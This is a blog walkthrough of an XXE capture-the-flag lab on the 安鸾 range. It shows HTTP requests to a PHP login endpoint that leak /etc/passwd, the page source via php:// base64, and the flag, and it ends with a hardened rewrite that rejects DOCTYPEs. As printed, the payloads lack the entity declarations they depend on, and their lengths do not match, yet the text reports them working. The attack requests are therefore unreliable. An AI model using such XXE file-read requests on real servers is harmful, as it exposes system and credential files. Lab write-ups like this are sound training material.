安鸾 Range: XXE Vulnerability
Preface
I was in a foul mood when I started this post, so I worked through a range to clear my head.
Note: this tutorial is for learning and reference only. Do not use it for illegal purposes; offenders bear the consequences themselves, and the author is not responsible. –涂寐
Notes
Range information
XML External Entity injection, abbreviated XXE.
Walkthrough
The login form gets the usual round of weak credentials first: admin/admin, and a popup appears. Change the password to see how the message changes.
```text
admin 登陆成功!
admin 登陆失败!
```

All right, try submitting an XML document directly, and a pile of error messages comes back.
```xml
<name>&tumei;</name>
```

```text
Error: Invalid XML:
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: XML declaration allowed only at the start of the document in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: StartTag: invalid element name in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: StartTag: invalid element name in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Entity 'tumei' not defined in Entity, line: 1 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: simplexml_import_dom() [<a href='function.simplexml-import-dom'>function.simplexml-import-dom</a>]: Invalid Nodetype to import in <b>/var/www/html/doLogin.php</b> on line <b>13</b>
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/html/doLogin.php:12) in <b>/var/www/html/doLogin.php</b> on line <b>27</b>
<result><code>0</code><msg></msg></result>:parsererror
```

A brief look at the errors; first, what a translator makes of them. The takeaway: the warnings leak the physical path of the script.
```text
错误:无效的XML:<br/>
<b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:仅允许在<b>/var/www/html/doLogin中的实体第1行的文档开头进行XML声明。php</b>在线<b>12</b><br/>
<br/>
<b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:StartTag:Entity中的元素名称无效,<b>/var/www/html/doLogin中的第1行。php</b>在线<b>12</b><br/>
<br/>
<b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:StartTag:Entity中的元素名称无效,<b>/var/www/html/doLogin中的第1行。php</b>在线<b>12</b><br/>
<br/>
<b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:未在<b>/var/www/html/doLogin中的实体第1行中定义实体“tumei”。php</b>在线<b>12</b><br/>
<br/>
<b>警告:simplexml导入dom()[<a href='function.simplexml导入dom'>函数。simplexml导入dom</a>]:要在<b>/var/www/html/doLogin中导入的节点类型无效。php</b>在线<b>13</b><br/>
<br/>
<b>警告</b>:无法修改标题信息-标题已由<b>/var/www/html/doLogin中的(输出开始于/var/www/html/doLogin.php:12)发送。php</b>在线<b>27</b><br/>
<result><code>0</code><msg></msg></result>:解析器错误
```

Forget that; let's capture the request in Burp and take a look.
```http
# The following comments are only my own understanding; differing views are welcome
POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
# Request header: the data types the sender (client) is willing to accept
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
# Entity header: the data type of the entity body the sender (client or server) is transmitting
Content-Type: application/xml;charset=utf-8
# Request style: XMLHttpRequest marks an Ajax (asynchronous HTTP) request
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 65
DNT: 1
Connection: close

<user><username>admin</username><password>admin</password></user>
```

The request headers (Accept in particular) show that the parameters travel as XML. Build the request body accordingly and, congratulations, a new error.
```http
POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 225
DNT: 1
Connection: close

<name>&tumei;</name>
<user><username>admin</username><password>admin</password></user>
```
```text
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Input is not proper UTF-8, indicate encoding !
Bytes: 0x81 0xFB 0xD6 0x84 in Entity, line: 3 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: DOMDocument::loadXML() [<a href='domdocument.loadxml'>domdocument.loadxml</a>]: Extra content at the end of the document in Entity, line: 6 in <b>/var/www/html/doLogin.php</b> on line <b>12</b>
<b>Warning</b>: simplexml_import_dom() [<a href='function.simplexml-import-dom'>function.simplexml-import-dom</a>]: Invalid Nodetype to import in <b>/var/www/html/doLogin.php</b> on line <b>13</b>
<b>Warning</b>: Cannot modify header information - headers already sent by (output started at /var/www/html/doLogin.php:12) in <b>/var/www/html/doLogin.php</b> on line <b>27</b>
<result><code>0</code><msg></msg></result>
```
```text
<br/>
<b>警告:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:输入不正确,请指示编码!
字节:0x81 0xFB 0xD6 0x84在实体中,第3行在<b>/var/www/html/doLogin中。php</b>在线<b>12</b><br/>
<br/>
<b>警告</b>:DOMDocument::loadXML()[<a href='DOMDocument.loadXML'>DOMDocument.loadXML</a>]:实体中文档末尾的额外内容,第6行,在<b>/var/www/html/doLogin中。php</b>在线<b>12</b><br/>
<br/>
<b>警告:simplexml导入dom()[<a href='function.simplexml导入dom'>函数。simplexml导入dom</a>]:要在<b>/var/www/html/doLogin中导入的节点类型无效。php</b>在线<b>13</b><br/>
<br/>
<b>警告</b>:无法修改标题信息-标题已由<b>/var/www/html/doLogin中的(输出开始于/var/www/html/doLogin.php:12)发送。php</b>在线<b>27</b><br/>
<result><code>0</code><msg></msg></result>
```

Put &tumei; in as the content of the username tag instead, and it suddenly works (I must be too green for this).
```http
POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 176
DNT: 1
Connection: close

<user><username>&tumei;</username><password>admin</password></user>
```
```http
200 OK
Date: Sun, 09 Jan 2022 03:04:32 GMT
Server: Apache/2.4.10 (Debian) PHP/5.3.29
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding
Content-Length: 1330
Connection: close
Content-Type: text/html; charset=utf-8

<result><code>0</code><msg>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
systemd-timesync:x:101:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:102:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:103:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:104:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:105:108::/var/run/dbus:/bin/false
</msg></result>
```

Switch approach: use the php:// pseudo-protocol with base64 encoding to read the page's own source.
```http
# Reason for the switch: read the source and output it base64-encoded, so the PHP file is not parsed and executed on the way out
# The file path here can be the absolute path the earlier error revealed: /var/www/html/doLogin.php
POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 203
DNT: 1
Connection: close

<user><username>&tumei;</username><password>admin</password></user>
```
```http
200 OK
Date: Sun, 09 Jan 2022 03:16:00 GMT
Server: Apache/2.4.10 (Debian) PHP/5.3.29
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding
Content-Length: 1066
Connection: close
Content-Type: text/html; charset=utf-8

<result><code>0</code><msg>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</msg></result>
```
Decoding the base64 gives the source of doLogin.php:

```php
<?php
$USERNAME = 'admin'; // account
$PASSWORD = 'admin'; // password
$result = null;
libxml_disable_entity_loader(false);
$xmlfile = file_get_contents('php://input');
try {
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $username = $creds->username;
    $password = $creds->password;
    if ($username == $USERNAME && $password == $PASSWORD) {
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>", 1, $username);
    } else {
        $result = sprintf("<result><code>%d</code><msg>%s</msg></result>", 0, $username);
    }
} catch (Exception $e) {
    $result = sprintf("<result><code>%d</code><msg>%s</msg></result>", 3, $e->getMessage());
}
header('Content-Type: text/html; charset=utf-8');
echo $result;
?>
```

Well, this only reads files, and I need a way to list directories to locate the flag.
... Going back to re-read the challenge: my mistake, the path is given outright: /flag
```http
POST /doLogin.php
Host: www.whalwl.work:8016
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: application/xml, text/xml, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/xml;charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: http://www.whalwl.work:8016/
Content-Length: 195
DNT: 1
Connection: close

<user><username>&tumei;</username><password>admin</password></user>
```
```http
200 OK
Date: Wed, 12 Jan 2022 16:20:19 GMT
Server: Apache/2.4.10 (Debian) PHP/5.3.29
X-Powered-By: PHP/5.3.29
Vary: Accept-Encoding
Content-Length: 94
Connection: close
Content-Type: text/html; charset=utf-8

<result><code>0</code><msg>ZmxhZ3tkOTdhYTY5YjAzNGQ2YjlhZjc0MmJkM2M2M2QxNWYwOX0=</msg></result>
```

The file:// protocol can be used directly instead and saves the decoding step.

```text
flag{d97aa69b034d6b9af742bd3c63d15f09}
```
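The source read back above shows the root cause: `libxml_disable_entity_loader(false)` together with `LIBXML_NOENT | LIBXML_DTDLOAD` tells libxml to fetch and substitute external entities, and the script then echoes both raw parser warnings (leaking the path) and `$username` (carrying the entity's content) back in `<msg>`. As an added example, not the range's code, here is a hardened rewrite of doLogin.php; it assumes PHP 7.1 or newer and keeps the same request body and response shape.

```php
<?php
// Hardened rewrite of the range's doLogin.php (added example, not the range's own code).
// Assumptions: PHP 7.1+, a <user><username/><password/></user> request body,
// and the same <result><code/><msg/></result> response shape as the original.
$USERNAME = 'admin';
$PASSWORD = 'admin';
// Parse the credentials without resolving entities or loading any DTD.
// Returns ['username' => ..., 'password' => ...] or null when the input is rejected.
function parseCredentials(string $xml): ?array
{
    // Cheap first gate: a login request has no business carrying a DOCTYPE,
    // and loadXML() would throw on an empty string in PHP 8.
    if ($xml === '' || preg_match('/<!DOCTYPE/i', $xml)) {
        return null;
    }
    // Collect libxml warnings instead of letting them leak paths into the response.
    $prevErrors = libxml_use_internal_errors(true);
    if (PHP_VERSION_ID < 80000) {
        // Deprecated from PHP 8.0, where external entity loading is already off by default.
        libxml_disable_entity_loader(true);
    }
    $dom = new DOMDocument();
    // No LIBXML_NOENT and no LIBXML_DTDLOAD: entities stay unexpanded and DTDs are not
    // fetched; LIBXML_NONET additionally forbids network access while parsing.
    $ok = $dom->loadXML($xml, LIBXML_NONET);
    libxml_clear_errors();
    libxml_use_internal_errors($prevErrors);
    // Reject malformed input and anything that still declares a document type.
    if ($ok === false || $dom->doctype !== null) {
        return null;
    }
    $creds = simplexml_import_dom($dom);
    if (!($creds instanceof SimpleXMLElement) || $creds->getName() !== 'user') {
        return null;
    }
    return [
        'username' => (string) $creds->username,
        'password' => (string) $creds->password,
    ];
}
$creds = parseCredentials((string) file_get_contents('php://input'));
// Constant-time comparison of both fields; every failure shares one fixed message, so the
// response never reflects attacker-controlled content (the channel the walkthrough used).
$ok = $creds !== null
    && hash_equals($USERNAME, $creds['username'])
    && hash_equals($PASSWORD, $creds['password']);
header('Content-Type: text/html; charset=utf-8');
echo $ok
    ? '<result><code>1</code><msg>login ok</msg></result>'
    : '<result><code>0</code><msg>login failed</msg></result>';
```

With this version the `&tumei;` request from the walkthrough is refused at the DOCTYPE gate, and even a payload that slipped past it would fail well-formedness because the entity is never defined, so `<msg>` can only ever carry one of the two fixed strings.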
Afterword
It was freezing; I thought about looking again tomorrow morning, but kept going anyway, and luckily got it.
A bit dumb of me not to read the challenge properly; fine, one more weakness found.
- Title: 安鸾之XXE漏洞
- Author: 涂寐
- Created: 2022-01-13 00:35:27
- Link: article/10a5a8a4.html
- License: unless otherwise stated, all posts on this blog are released under the BY-NC-SA licence. Please credit the source when reposting!